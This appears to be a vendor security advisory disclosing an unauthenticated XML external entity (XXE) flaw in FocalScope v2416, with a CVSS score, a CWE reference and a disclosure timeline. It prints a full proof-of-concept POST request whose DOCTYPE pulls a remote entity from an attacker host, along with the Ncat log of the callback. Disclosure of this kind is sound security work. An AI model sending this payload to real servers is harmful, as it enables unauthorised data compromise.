An exploitable unauthenticated XML external injection vulnerability was identified in FocalScope v2416. A unauthenticated attacker could submit a specially crafted web request to FocalScope’s server that could cause an XXE, and potentially result in data compromise.
9.4 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
CWE-611: Improper Restriction of XML External Entity Reference (‘XXE’)
FocalScope v2416 and prior is vulnerable to an unauthenticated XML External Entity injection attack. The following XML payload was used to trigger the XXE:
POST /emm/_cros_/xlogin.asp HTTP/1.1 Host: [IP] Content-Length: 315 Origin: http://[IP] User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Content-Type: text/xml; charset=UTF-8 Accept: / DNT: 1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Connection: close <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://x.x.x.x/xxe"> %remote;%int;%trick;]><body><o i='msg'><s i='_url'>url:xlogin.asp</s><s i='_fnc'>GetSalt</s><o i='oParam'><s i='sUser'>PCSL</s><s i='sMyName'>self</s><s i='sCallback'>PutSalt</s></o></o></body> On the attacking Server the following request can be observed: Ncat: Connection from x.x.x.x. Ncat: Connection from x.x.x.x. GET /xxe HTTP/1.0 Accept: / UA-CPU: AMD64 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: x.x.x.x Connection: Keep-Alive
Note: It was also observed that pretty much any page which takes XML input in POST request is vulnerable to this vulnerability, regardless of whether pages are protected by authentication or not.
2018-04-09 - Vendor Disclosure
2018-04-12 - Sent plain text file to vendor
2018-06-05 - 60 day follow up
2018-06-27 - Final follow up
2018-07-20 - Public Release
Discovered by Jerzy (Yuri) Kramarz of Security Advisory EMEAR